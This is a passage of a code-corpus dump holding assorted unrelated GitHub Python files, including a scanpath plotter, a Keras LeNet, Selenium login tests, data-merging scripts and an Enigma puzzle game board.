(bbox[1], bbox[3])]\n target_height = bbox[2] - bbox[0]\n target_width = bbox[3] - bbox[1]\n bbox = [bbox[1], bbox[0], target_width, target_height]\n\n save_path = path.join('Plots', path.join(dataset_name + '_dataset', image_name[:-4]))\n if not path.exists(save_path):\n makedirs(save_path)\n\n title = image_name[:-4] + '_' + subject.replace(' ', '_')\n\n plot_scanpath(img, X, Y, fixation_size, bbox, title, save_path)\n\nif __name__ == '__main__':\n args = parse_args()\n\n if not args.human:\n scanpaths_dir = path.join(path.join(RESULTS_DIR, args.dataset + '_dataset'), args.model)\n if not path.exists(scanpaths_dir):\n print('There are no results for ' + 
args.model + ' in the ' + args.dataset + ' dataset')\n sys.exit(0)\n\n scanpaths_file = path.join(scanpaths_dir, 'Scanpaths.json')\n scanpaths = load_dict_from_json(scanpaths_file)\n \n if args.img != 'notfound':\n if not args.img in scanpaths:\n print('Image not found in ' + args.model + ' scanpaths')\n sys.exit(0)\n img_scanpath = scanpaths[args.img]\n subject = args.model\n else:\n human_scanpaths_dir = path.join(path.join(DATASETS_DIR, args.dataset), 'human_scanpaths')\n if not path.exists(human_scanpaths_dir) or not listdir(human_scanpaths_dir):\n print('There are no human subjects scanpaths for this dataset')\n sys.exit(0)\n \n human_scanpaths_files = listdir(human_scanpaths_dir)\n number_of_subjects = len(human_scanpaths_files)\n if isinstance(args.human, str):\n human_subject = int(args.human) - 1\n else:\n human_subject = randint(0, number_of_subjects - 1)\n human_scanpaths_files.sort()\n\n target_found = False\n checked_subjects = []\n while not target_found:\n scanpaths_file = path.join(human_scanpaths_dir, human_scanpaths_files[human_subject])\n scanpaths = load_dict_from_json(scanpaths_file)\n \n if args.img in scanpaths:\n img_scanpath = scanpaths[args.img]\n target_found = img_scanpath['target_found']\n if not target_found:\n checked_subjects.append(human_subject)\n if len(checked_subjects) == number_of_subjects or isinstance(args.human, str):\n print('No successful trial has been found for image ' + args.img)\n sys.exit(0)\n\n human_subject = randint(0, number_of_subjects - 1)\n while human_subject in checked_subjects:\n human_subject = randint(0, number_of_subjects - 1)\n \n subject = 'Human subject ' + human_scanpaths_files[human_subject][4:6]\n \n dataset_path = path.join(DATASETS_DIR, args.dataset)\n dataset_info = load_dict_from_json(path.join(dataset_path, 'dataset_info.json'))\n \n images_path = path.join(dataset_path, dataset_info['images_dir'])\n\n trials_properties_file = path.join(dataset_path, 'trials_properties.json')\n trials_properties = load_dict_from_json(trials_properties_file)\n \n trial_info = get_trial_info(args.img, trials_properties)\n\n if args.img == 'notfound' and not args.human:\n for image_name in scanpaths.keys():\n if not scanpaths[image_name]['target_found']:\n process_image(scanpaths[image_name], subject, image_name, args.dataset, trial_info, images_path)\n else:\n process_image(img_scanpath, subject, args.img, args.dataset, trial_info, images_path)","repo_name":"FerminT/VisualSearchBenchmark","sub_path":"Metrics/plot_scanpath.py","file_name":"plot_scanpath.py","file_ext":"py","file_size_in_byte":8755,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"3"} +{"seq_id":"47565519378","text":"# buscando as palavras \nimport random\n\ndef palavras():\n #buscando o txt com as palavras \n with open('palavra.txt','r') as arquivo:\n palavras = []\n for palavra in arquivo:\n palavras.append(palavra.strip().lower())\n\n #gerando a palavra escolhida de forma aleatoria\n numero_aleatorio = random.randrange(0,len(palavras))\n palavra_escolhida = palavras[numero_aleatorio]\n return palavra_escolhida\n \n","repo_name":"wallacegoulart/Jogos-de-Pyhton","sub_path":"forca/palavras.py","file_name":"palavras.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"30410878351","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # Quizz 1\n\n# In[1]:\n\n\nfrom jupyterquiz import display_quiz\n\nquizz =[{\n \"question\": 
\"Comment charger un module sur le cluster de l'IFB ?\",\n \"type\": \"multiple_choice\",\n \"answers\": [\n {\n \"code\": \"module avail -l\",\n \"correct\": False\n },\n {\n \"code\": \"module load\",\n \"correct\": True\n },\n {\n \"code\": \"module charge\",\n \"correct\": False\n }\n ]\n },\n {\n \"question\": \"Comment se connecter au cluster de l'IFB ?\",\n \"type\": \"multiple_choice\",\n \"answers\": [\n {\n \"code\": \"SSH\",\n \"correct\": True\n },\n {\n \"code\": \"Jypyter\",\n \"correct\": True\n },\n {\n \"code\": \"Galaxy\",\n \"correct\": True\n },\n {\n \"code\": \"En branchant mon ordinateur directement dessus\",\n \"correct\": False\n }\n ]\n },\n {\n \"question\": \"BASH est le seul langage compris par le Shell ?\",\n \"type\": \"multiple_choice\",\n \"answers\": [\n {\n \"code\": \"Vrai\",\n \"correct\": True,\n \"feedback\": \"Il y a aussi : bsh, ksh, csh, zsh,…\"\n },\n {\n \"code\": \"Faux\",\n \"correct\": False,\n \"feedback\": \"Il y a aussi : bsh, ksh, csh, zsh,…\"\n },\n ]\n }\n]\ndisplay_quiz(quizz)\n\n","repo_name":"IFB-ElixirFr/LinuxEBAII","sub_path":"docs/_build/jupyter_execute/quizz_01.py","file_name":"quizz_01.py","file_ext":"py","file_size_in_byte":1626,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"32613673622","text":"from data_source.iprice import IPrice\r\nfrom model.price import Price\r\nfrom model.productCatalog import ProductCatalog\r\n\r\nclass TestPrice(IPrice):\r\n\r\n def get_last_price_for_product(self, productId) -> Price:\r\n return Price(\r\n 2, \r\n ProductCatalog(5, \"jjgjgjg\", \"jgjgjgj\", \"jfjfjf\", {}),\r\n \"2021-06-12\",\r\n 52.16\r\n )","repo_name":"Krysox/ProjetCleanArchitecture","sub_path":"data_source/test_price.py","file_name":"test_price.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"23334763412","text":"from index_monkey.scrapers import snp500, xlb, xlc, xle, xlf, xli, xlk, xlp, xlre, xlu, xlv, xly\nimport datetime\nfrom index_monkey.loaders.price import PriceLoader\n\nINDEX_NAMES = [\n xlb.INDEX_NAME,\n xlc.INDEX_NAME,\n xle.INDEX_NAME,\n xlf.INDEX_NAME,\n xli.INDEX_NAME,\n xlk.INDEX_NAME,\n xlp.INDEX_NAME,\n xlre.INDEX_NAME,\n xlu.INDEX_NAME,\n xlv.INDEX_NAME,\n xly.INDEX_NAME,\n snp500.INDEX_NAME,\n]\n\n\ndef fetch_prices(start_date=None, end_date=None, indices=None):\n start_date = start_date or (datetime.date.today() - datetime.timedelta(days=2))\n end_date = end_date or (datetime.date.today() - datetime.timedelta(days=1))\n indices = indices or INDEX_NAMES\n for index in indices:\n p = PriceLoader(index, start_date, end_date, use_latest_index_weighting=True)\n p.fetch_prices()\n print(f'{index} price scraped between {start_date} and {end_date}')\n\n\nif __name__ == '__main__':\n start_date = datetime.date.today()\n end_date = start_date + datetime.timedelta(days=1)\n fetch_prices(start_date=start_date, end_date=end_date)\n","repo_name":"tradingwithpandas/IndexMonkey","sub_path":"index_monkey/loaders/scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":1089,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"12904802296","text":"import pandas as pd\nfrom datetime import date\n\nfile_mps = 'C:\\\\Users\\\\ms3504\\\\Desktop\\\\Python Script\\\\Planner_file\\\\PLN_WW_O.xls.xlsx'\nfile_seg = 'C:\\\\Users\\\\ms3504\\\\Desktop\\\\Python Script\\\\Planner_file\\\\211011 - ABC RST 
Segmentation.xlsx'\n\nmps = pd.read_excel(file_mps)\nseg = pd.read_excel(file_seg)\n\nprint(mps.head())\n\n# Trim the space trailed in the columns of product file, Ex: 'Item ' => 'Item'\nmps.columns = mps.columns.str.rstrip()\n\n# Trim the space trailed in all rows of Item column, Ex: '8085-00481 ' => '8085-00481'\nmps['Item'] = mps['Item'].str.rstrip()\n\n# Print the first 10 rows the product panda object\nprint(mps.head(10))\n\n# Create the column \"Value\" on the MPS file to see the final ordering value\nmps['Value'] = mps['Frz Cost']*mps['Opn Qty']\n\n# Trim the space trailed in the columns of inventory file, Ex: 'Item CD ' => 'Item CD'\nseg.columns = seg.columns.str.rstrip()\nprint(seg.head())\n\n# Trim the space trailed in all rows of all columns, Ex: '8085-00481 ' => '8085-00481', 'A1X ' => 'A1X'\nseg['Item CD'] = seg['Item CD'].str.strip()\nseg['Segm'] = seg['Segm'].str.rstrip()\nseg['RST'] = seg['RST'].str.rstrip()\n\n# Check for duplicate values in seg file. \nprint(seg.duplicated().value_counts())\n\n# Merge seg file into the mps based on the 'Item' column in mps file and 'Item CD' column in seg.\n# This is equivalent to the vlookup function of Excel.\nmerged_file = mps.merge(seg, left_on = 'Item', right_on='Item CD', how='left')\nprint(merged_file.head(20))\n\n# Check the type of each column\nprint(merged_file.info())\n\n# Only select the columns you are interested in.\nmerged_file = merged_file[['Pref', 'Item', 'Rel Dte', 'Due Dte', 'Res Dte', 'Opn Qty', 'Lot Qty', 'Lead Time',\n 'Item Type', 'Vendr','Segm', 'RST', 'Description', 'Bu', 'Div', 'Mrkt',\n 'Frz Cost', 'Value', 'Fac', 'Pln', 'On Hand Qty', 'Opn MPS', 'R/O Trans', 'Opn CST', 'Avg Sales', 'Mth Cov','P/O Transit',\n 'U/M Conv']]\n\nprint(merged_file.columns)\n\n# Because Pandas will append the time into the date field, it will become something like 27/10/2021 12:00:00 AM.\nmerged_file['Rel Dte'] = merged_file['Rel Dte'].dt.normalize()\nmerged_file['Due Dte'] = merged_file['Due Dte'].dt.normalize()\n\n# Sort the merged file by Rel Dte \nmerged_file.sort_values(by=\"Rel Dte\", axis=0, inplace=True)\nprint(merged_file.head())\n\n# remove the rows with Vendr = 0\nmerged_file = merged_file[merged_file.Vendr != 0]\nprint(merged_file.head())\n\n# Save the merged_file to an excel file\n# Rename the file name before to run the code\nmerged_file.to_excel('C:\\\\Users\\\\ms3504\\\\Desktop\\\\Python Script\\\\Planner_file\\\\Planning_WW_PLN_O_week40.xlsx', index=False)\n","repo_name":"MelanieFR/Gates-Corporation","sub_path":"clean and merge for planners.py","file_name":"clean and merge for planners.py","file_ext":"py","file_size_in_byte":2692,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"7681349532","text":"from flectra import models, fields\n\n\nclass AccountPayment(models.Model):\n _inherit = 'account.payment'\n\n x_account_analytic_account_id = fields.Many2one('account.analytic.account', string='Proyecto', store=True)\n x_name = fields.Char(string='Glosa', store=True);\n x_income_document_number = fields.Char(string='Nº Doc. 
Ingreso', store=True, index=True);\n x_is_charged = fields.Boolean(default=True, string='Cobrado?')\n\n _sql_constraints = [\n ('x_income_document_number', 'unique (x_income_document_number, payment_method_id, payment_type)', 'El Nº de documento debe ser único por método de pago!')\n ]\n","repo_name":"cv2310/flectra20-adra-programas","sub_path":"models/account_payment.py","file_name":"account_payment.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"4853484178","text":"from keras.models import Sequential\nfrom keras.layers.convolutional import Conv2D, MaxPooling2D\nfrom keras.layers.core import Activation, Flatten, Dense\nfrom keras.datasets import mnist\nfrom keras.utils import np_utils\nfrom keras.callbacks import EarlyStopping, ModelCheckpoint, TensorBoard\nfrom keras.optimizers import Adam\n\n\nclass LeNet:\n NUM_CLASS = 10\n IMG_ROWS, IMG_COLS = 28, 28\n INPUT_SHAPE = (IMG_ROWS, IMG_COLS, 1)\n\n EPOCH = 200\n BATCH_SIZE = 128\n VERBOSE = 2\n VALIDATION_SPLIT = 0.2\n OPTIMIZER = Adam()\n\n early_stopping = EarlyStopping(\n monitor='val_loss',\n patience=20,\n verbose=0,\n mode='auto'\n )\n checkpoint = ModelCheckpoint(filepath='model/LeNet.model', save_best_only=True)\n # tensorboard --logdir=CNN/log/\n tensorboard = TensorBoard(log_dir='log/', write_graph=False)\n\n model = None\n\n @classmethod\n def build(cls):\n cls.model = Sequential()\n\n cls.model.add(Conv2D(20, kernel_size=5, padding='same', input_shape=cls.INPUT_SHAPE))\n cls.model.add(Activation('relu'))\n cls.model.add(MaxPooling2D(pool_size=(2, 2), strides=(2, 2)))\n\n cls.model.add(Conv2D(50, kernel_size=5, padding='same'))\n cls.model.add(Activation('relu'))\n cls.model.add(MaxPooling2D(pool_size=(2, 2), strides=(2, 2)))\n\n cls.model.add(Flatten())\n\n cls.model.add(Dense(500))\n cls.model.add(Activation('relu'))\n\n cls.model.add(Dense(cls.NUM_CLASS))\n cls.model.add(Activation(\"softmax\"))\n\n cls.model.summary()\n cls.model.compile(loss='categorical_crossentropy', optimizer=cls.OPTIMIZER, metrics=['accuracy'])\n\n @classmethod\n def get_data(cls):\n (X_train, y_train), (X_test, y_test) = mnist.load_data()\n\n X_train = X_train.reshape(-1, cls.IMG_ROWS, cls.IMG_COLS, 1) / 255.0\n X_test = X_test.reshape(-1, cls.IMG_ROWS, cls.IMG_COLS, 1) / 255.0\n\n y_train = np_utils.to_categorical(y_train, cls.NUM_CLASS)\n y_test = np_utils.to_categorical(y_test, cls.NUM_CLASS)\n\n return (X_train, y_train), (X_test, y_test)\n\n @classmethod\n def train(cls, X_train, y_train):\n cls.model.fit(X_train, y_train, batch_size=cls.BATCH_SIZE, epochs=cls.EPOCH, verbose=cls.VERBOSE,\n validation_split=cls.VALIDATION_SPLIT,\n callbacks=[cls.early_stopping, cls.checkpoint, cls.tensorboard])\n\n @classmethod\n def evaluate(cls, X_test, y_test):\n score = cls.model.evaluate(X_test, y_test, verbose=cls.VERBOSE)\n print(\"loss:\", score[0])\n print(\"accuracy:\", score[1])\n\n\nLeNet.build()\n(X_train, y_train), (X_test, y_test) = LeNet.get_data()\nLeNet.train(X_train, y_train)\nLeNet.evaluate(X_test, y_test)\n","repo_name":"govida/mlzoo","sub_path":"CNN/LeNet.py","file_name":"LeNet.py","file_ext":"py","file_size_in_byte":2748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"42346943666","text":"import pip\nimport sys\nimport subprocess\n\ndef install(package):\n if hasattr(pip, 'main'):\n pip.main(['install', package])\n else:\n pip._internal.main(['install', package])\n\ndef 
install(item_list):\n\t#Refer https://pip.pypa.io/en/latest/user_guide/#using-pip-from-your-program\n\ttry:\n\t\tinstalled_file = open('installed.txt','r')\n\t\tinstalled_list = installed_file.read().split('\\n')\n\t\titem_list = [x for x in item_list if x not in installed_list]\n\texcept Exception as e:\n\t\tprint(e)\n\t\n\tfor item in item_list:\n\t\tprint('Attempting install of {}'.format(item))\n\t\toutput = 0\n\t\ttry:\n\t\t\toutput = subprocess.run([sys.executable, '-m', 'pip', 'install', item], capture_output=True, check=True)\n\t\t\tif output.returncode==0:\n\t\t\t\tprint(str(output.stdout, 'utf-8'))\n\t\t\t\tprint('Completed Installation of {}'.format(item))\n\t\t\t\twith open('installed.txt', 'a') as installed_list:\n\t\t\t\t\tinstalled_list.write(item+'\\n')\n\t\t\telse:\n\t\t\t\tprint('Failure while installing {}'.format(item))\n\t\t\t\tprint(str(output.stderr, 'utf-8'))\n\t\t\t\tbreak\n\t\texcept Exception as e:\n\t\t\tprint(e)\n\nif __name__ == '__main__':\n\twith open('requirements.txt', 'r') as requirements_list:\n\t\titems_list = requirements_list.read().split('\\n')\n\t\tinstall(items_list)\n\t\timport nltk\n\t\tnltk.download('all') \n \n","repo_name":"supratikchatterjee16/setup","sub_path":"installations.py","file_name":"installations.py","file_ext":"py","file_size_in_byte":1262,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"73311797201","text":"from math import floor\r\n\r\ndef contfracsqrt(n):\r\n m = 0\r\n d = 1\r\n a = floor(n**0.5)\r\n h = []\r\n r = []\r\n while (m,d,a) not in h:\r\n h += [(m,d,a)]\r\n r += [a]\r\n m = d*a - m\r\n d = (n - m**2)/d\r\n a = floor(((n**0.5)+m)/d)\r\n return r\r\n\r\nc = 0\r\nfor n in range(1,10000):\r\n if floor(n**0.5) == n**0.5:\r\n pass\r\n else:\r\n if len(contfracsqrt(n)) % 2 == 0:\r\n c += 1\r\n\r\nprint(c)\r\n","repo_name":"americanjetset/project_euler","sub_path":"64.py","file_name":"64.py","file_ext":"py","file_size_in_byte":452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"27452857517","text":"\r\n\r\n# -*- coding: utf-8 -*-\r\n\r\n\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport os\r\nimport sys \r\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\r\n\r\n\r\nimport cv2\r\nfrom sklearn.utils import class_weight\r\n\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.model_selection import cross_val_score\r\nimport tensorflow as tf\r\nfrom sklearn.neighbors import KNeighborsClassifier\r\nfrom sklearn.discriminant_analysis import LinearDiscriminantAnalysis\r\nfrom sklearn.svm import SVC\r\nfrom sklearn.linear_model import LogisticRegression\r\nfrom sklearn.ensemble import RandomForestClassifier\r\nfrom sklearn.metrics import accuracy_score\r\nfrom tensorflow.keras.models import load_model\r\nimport tensorflow\r\nfrom tensorflow.keras.models import Sequential\r\nfrom tensorflow.keras.layers import Dense, Dropout, Flatten\r\nfrom tensorflow.keras.layers import Conv2D, MaxPooling2D\r\nfrom tensorflow.keras import backend as K\r\n\r\npath = \"C:/Work/sgndataset/train/\"\r\nclass_names = sorted(os.listdir(path)) # need to correct\r\n\r\nbase_model = tf.keras.applications.mobilenet.MobileNet(\r\n input_shape = (224,224,3),\r\n include_top = False)\r\n\r\nbase_model.summary() # listing of the network structure\r\n\r\nin_tensor = base_model.inputs[0]\r\nout_tensor = base_model.outputs[0] \r\n # Grab the input of base model out_tensor = 
base_model.outputs[0]\r\n # Grab the output of base model\r\n # Add an average pooling layer (averaging each of the 1024 channels):\r\n \r\nout_tensor = tf.keras.layers.GlobalAveragePooling2D()(out_tensor)\r\n# Define the full model by the endpoints.\r\nmodel = tf.keras.models.Model(inputs = [in_tensor], outputs = [out_tensor])\r\n# Compile the model for execution. Losses and optimizers\r\n# can be anything here, since we don’t train the model. model.compile(loss = \"categorical_crossentropy\", optimizer = ’sgd’)\r\n\r\n# Find all image files in the data directory.\r\n\r\nX = [] # Feature vectors will go here.\r\ny = [] # Class ids will go here.\r\n\r\nfor root, dirs, files in os.walk(r\"C:/Work/sgndataset/train/\"):\r\n for name in files:\r\n # Load the image:\r\n if name.endswith(\".jpg\"):\r\n img = plt.imread(root + os.sep + name)\r\n \r\n # Resize it to the net input size:\r\n img = cv2.resize(img, (224, 224))\r\n \r\n # Convert the data to float, and remove mean:\r\n img = img.astype(np.float32)\r\n img -= 128\r\n \r\n # Push the data through the model:\r\n# x = model.predict(img[np.newaxis, ...])[0]\r\n \r\n # And append the feature vector to our list.\r\n X.append(img)\r\n \r\n # Extract class name from the directory name:\r\n label = root.split('/')[-1]\r\n y.append(class_names.index(label))\r\n\r\n# Cast the python lists to a numpy array.\r\nX = np.array(X)\r\ny = np.array(y)\r\nnum_classes = 17\r\n#np.save('X_data',X)\r\n#np.save('y_data',y)\r\nX=np.load('Ximg_data.npy')\r\nY=np.load('yimg_data.npy')\r\n\r\n\r\nX_train, X_tst, y_train, y_test = train_test_split(X, Y, test_size = 0.2)\r\n####\r\n\r\n# CALCULATE THE WEIGHTS \r\n\r\nclass_weights = class_weight.compute_class_weight('balanced',\r\n np.unique(y_train),\r\n y_train)\r\nclass_weights = dict(enumerate(class_weights))\r\n\r\ny_train = tensorflow.keras.utils.to_categorical(y_train, num_classes)\r\ny_test = tensorflow.keras.utils.to_categorical(y_test, num_classes)\r\n\r\ndatagen = ImageDataGenerator(\r\n featurewise_center=True,\r\n featurewise_std_normalization=True,\r\n rotation_range=20,\r\n width_shift_range=0.2,\r\n height_shift_range=0.2,\r\n rescale=1./255,\r\n shear_range=0.2,\r\n zoom_range=0.2,\r\n horizontal_flip=True,\r\n fill_mode='nearest')\r\n# compute quantities required for featurewise normalization\r\n# (std, mean, and principal components if ZCA whitening is applied)\r\ndatagen.fit(X_train)\r\n# fits the model on batches with real-time data augmentation:\r\n\r\n\r\n\r\n\r\n# Classifiers\r\n\r\n#base_model = tensorflow.keras.applications.mobilenet.MobileNet(input_shape=(224,224,3),include_top = False, alpha=0.25)\r\n#base_model = tensorflow.keras.applications.mobilenet_v2.MobileNetV2(input_shape=(224,224,3),\r\n# alpha=1.0, include_top=False,\r\n# weights='imagenet', input_tensor=None, pooling=None, classes=17)\r\nbase_model = tensorflow.keras.applications.inception_v3.InceptionV3(include_top=False, weights='imagenet',\r\n input_tensor=None, input_shape=(224,224,3), pooling=None, classes=17)\r\n\r\n\r\n\r\n\r\nin_tensor = base_model.inputs[0] # Grab the input of base model\r\n# Grab the output of base model\r\nout_tensor = base_model.outputs[0]\r\nout_tensor =tensorflow.keras.layers.Flatten()(out_tensor)\r\nout_tensor =tensorflow.keras.layers.Dense(100, activation='relu')(out_tensor)\r\nout_tensor =tensorflow.keras.layers.Dense(17,activation='softmax')(out_tensor)\r\nmodel = tensorflow.keras.models.Model(inputs = [in_tensor],outputs = [out_tensor])\r\nmodel.summary()\r\nbatch_size = 50\r\n\r\nepochs = 
30\r\n\r\nmodel.compile(loss=tensorflow.keras.losses.categorical_crossentropy,\r\n optimizer=tensorflow.keras.optimizers.Adadelta(),\r\n metrics=['accuracy'])\r\n\r\nmodel.fit_generator(datagen.flow(X_train, y_train, batch_size=128),\r\n steps_per_epoch=len(X_train) /128, epochs=15)\r\n\r\nmodel.fit(X_train, y_train,batch_size=batch_size,epochs=epochs,\r\n class_weight=class_weights,verbose=1,validation_data=(X_tst, y_test))\r\nscore = model.evaluate(X_tst, y_test, verbose=0)\r\n\r\nprint('Test loss:', score[0])\r\n\r\nprint('Test accuracy:', score[1])\r\n\r\n\r\nfrom pathlib import Path\r\n\r\n\r\n\r\nmodel=load_model('incep_trial_weights.h5')\r\n\r\n\r\nbasepath = Path(\"C:/Work/sgndataset/testset/\")\r\nfiles_in_basepath = basepath.iterdir()\r\nwith open(\"submission.csv\", \"w\") as fp:\r\n fp.write(\"Id,Category\\n\")\r\n for image in files_in_basepath:\r\n# print(image)\r\n img = plt.imread(image)\r\n image=str(image).split('\\\\')[-1]\r\n image=image.split('.')[0]\r\n img = cv2.resize(img, (224, 224))\r\n#\r\n img = img.astype(np.float32)\r\n img -= 128\r\n#\r\n pred=model.predict(img[np.newaxis, ...])[0]\r\n index = np.argmax(pred, axis=0)\r\n # Extract class name from the directory name:\r\n label = class_names[index]\r\n fp.write(\"%d,%s\\n\" % (int(image), label))\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"Mouna96/PrMl","sub_path":"competitionpart2.py","file_name":"competitionpart2.py","file_ext":"py","file_size_in_byte":6602,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"26168202372","text":"from selenium import webdriver\nimport time\nimport unittest\nimport HtmlTestRunner\n\nimport sys\nsys.path.append(\"/Users/sathu/PycharmProjects/OrangeHRMSite\")\n\n\nfrom SampleProjects.POMProjectDemo.Pages.loginpage import loginpage\nfrom SampleProjects.POMProjectDemo.Pages.Homepage import Homepage\n\n\nclass loginTest(unittest.TestCase):\n\n @classmethod\n def setUpClass(cls):\n cls.driver = webdriver.Chrome()\n cls.driver.implicitly_wait(10)\n cls.driver.maximize_window()\n\n def test_01_login_valid(self):\n driver = self.driver\n driver.get(\"https://opensource-demo.orangehrmlive.com/\")\n\n login = loginpage(driver)\n login.enter_username(\"Admin\")\n login.enter_password(\"admin123\")\n time.sleep(3)\n login.click_login()\n time.sleep(2)\n\n homepage = Homepage(driver)\n homepage.click_welcome()\n time.sleep(2)\n homepage.click_logout()\n time.sleep(2)\n #self.driver.find_element_by_id(\"txtUsername\").send_keys(\"Admin\")\n #self.driver.find_element_by_id(\"txtPassword\").send_keys(\"admin123\")\n #self.driver.find_element_by_id(\"btnLogin\").click()\n #time.sleep(3)\n #self.driver.find_element_by_xpath(\"//*[@id='welcome']\").click()\n #time.sleep(3)\n #self.driver.find_element_by_link_text(\"Logout\").click()\n #time.sleep(2)\n\n\n def test_02_login_Invalid_username(self):\n driver2 = self.driver\n driver2.get(\"https://opensource-demo.orangehrmlive.com/\")\n\n login2 = loginpage(driver2)\n login2.enter_username(\"Admim1\")\n login2.enter_password(\"admin2123\")\n time.sleep(3)\n login2.click_login()\n time.sleep(2)\n message = driver2.find_element_by_xpath(\"\").text\n self.assertEqual(message, \"Invalid credentials123\" )\n\n #self.driver.find_element_by_id(\"txtUsername\").send_keys(\"Admin\")\n #self.driver.find_element_by_id(\"txtPassword\").send_keys(\"admin123\")\n #self.driver.find_element_by_id(\"btnLogin\").click()\n #time.sleep(3)\n 
#self.driver.find_element_by_xpath(\"//*[@id='welcome']\").click()\n #time.sleep(3)\n #self.driver.find_element_by_link_text(\"Logout\").click()\n #time.sleep(2)\n\n @classmethod\n def tearDownClass(cls):\n cls.driver.close()\n cls.driver.quit()\n print(\"Test Completed\")\n\nif __name__ == '__main__':\n unittest.main(testRunner=HtmlTestRunner.HTMLTestRunner(output='/Users/sathu/PycharmProjects/OrangeHRMSite/Reports'))","repo_name":"sathappan1989/OrangeHRMSite","sub_path":"SampleProjects/POMProjectDemo/Tests/login.py","file_name":"login.py","file_ext":"py","file_size_in_byte":2521,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"12996800206","text":"\nimport random\nimport time\nfrom enum import Enum\n\nimport EnigmaGame.const as const\nfrom EnigmaGame.blocks import Blocks\nfrom EnigmaGame.figure import Figure\n\n\nclass Disc(Enum):\n LOWER = 0\n UPPER = 1\n\n\nclass Direction(Enum):\n RIGHT = 0\n LEFT = 1\n\n\nclass Board:\n\n def __init__(self):\n\n self.numTurns = 20\n self.bShowTurns = False\n self.level = 1\n self.startTime = None\n\n self.upperCenterX = 116.60\n self.upperCenterY = 200\n self.lowerCenterX = 116.60\n self.lowerCenterY = 100\n\n self.moves = []\n self.gameActive = False\n self.gameMoves = 0\n self.gameSuccess = False\n\n self.upperBones = []\n self.lowerBones = []\n self.upperStones = []\n self.lowerStones = []\n\n self.stones = []\n self.bones = []\n self.frame = None\n\n self.w = 230\n self.h = 300\n\n self.init_board()\n\n def init_board(self):\n self.numTurns = 20\n self.bShowTurns = False\n\n self.gameActive = False\n self.moves = []\n self.gameMoves = 0\n\n self.upperBones = [0] * 6\n self.lowerBones = [0] * 6\n self.upperStones = [0] * 6\n self.lowerStones = [0] * 6\n\n self.stones = []\n for i in range(0, 10):\n self.stones.append(Figure())\n\n self.bones = []\n for i in range(0, 11):\n self.bones.append(Figure())\n\n self.frame = Figure()\n\n Blocks.color_blocks(self.level)\n\n self.bones[0].add_block(28)\n self.bones[0].add_block(29)\n\n for i in range(1, 6):\n self.bones[i].add_block(5 * (i - 1) + 3)\n self.bones[i].add_block(5 * (i - 1) + 4)\n\n for i in range(0, 6):\n self.stones[i].add_block(5 * i)\n self.stones[i].add_block(5 * i + 1)\n self.stones[i].add_block(5 * i + 2)\n\n for i in range(6, 11):\n self.bones[i].add_block(5 * i)\n self.bones[i].add_block(5 * i + 1)\n\n for i in range(6, 10):\n self.stones[i].add_block(5 * i + 2)\n self.stones[i].add_block(5 * i + 3)\n self.stones[i].add_block(5 * i + 4)\n\n for i in range(0, 12):\n self.frame.add_block(i + 52)\n\n for i in range(0, 6):\n self.upperBones[i] = i\n self.lowerBones[i] = i + 5\n self.upperStones[i] = i\n self.lowerStones[i] = i + 4\n\n self.upperCenterX = 116.60\n self.upperCenterY = 200\n self.lowerCenterX = 116.60\n self.lowerCenterY = 100\n\n self.w = 230\n self.h = 300\n\n def on_resize(self, w, h):\n dx = 1.0 * w / self.w\n dy = 1.0 * h / self.h\n\n Blocks.scale_blocks(dx)\n\n self.upperCenterX = self.upperCenterX * dx\n self.upperCenterY = self.upperCenterY * dy\n self.lowerCenterX = self.lowerCenterX * dx\n self.lowerCenterY = self.lowerCenterY * dy\n\n self.h = h\n self.w = w\n\n def get_middle_x(self):\n return (self.upperCenterX + self.lowerCenterX) / 2.0\n\n def get_middle_y(self):\n return (self.upperCenterY + self.lowerCenterY) / 2.0\n\n def get_runtime(self):\n return int(time.time() - self.startTime)\n\n def get_turns(self):\n return len(self.moves) - self.gameMoves\n\n def on_draw(self):\n self.draw_background()\n 
self.draw_upper_disk()\n self.draw_lower_disk()\n\n def draw_background(self):\n self.frame.draw()\n\n def draw_upper_disk(self):\n\n for i in range(0, 6):\n self.bones[self.upperBones[i]].draw()\n self.stones[self.upperStones[i]].draw()\n pass\n\n def draw_lower_disk(self):\n for i in range(0, 6):\n self.bones[self.lowerBones[i]].draw()\n self.stones[self.lowerStones[i]].draw()\n pass\n\n def turn_disc(self, direction: Direction, disc: Disc):\n new_bones = [0] * 6\n new_stones = [0] * 6\n\n self.moves.append([direction, disc])\n\n if disc == Disc.UPPER:\n if direction == Direction.LEFT:\n for i in range(0, 6):\n if self.upperStones[i] >= 6:\n self.stones[self.upperStones[i]].inc_orient()\n\n idx = i + 5\n if idx > 5:\n idx -= 6\n\n new_bones[idx] = self.upperBones[i]\n new_stones[idx] = self.upperStones[i]\n\n else:\n for i in range(0, 6):\n if self.upperStones[i] >= 6:\n self.stones[self.upperStones[i]].dec_orient()\n\n idx = i - 5\n if idx < 0:\n idx += 6\n new_bones[idx] = self.upperBones[i]\n new_stones[idx] = 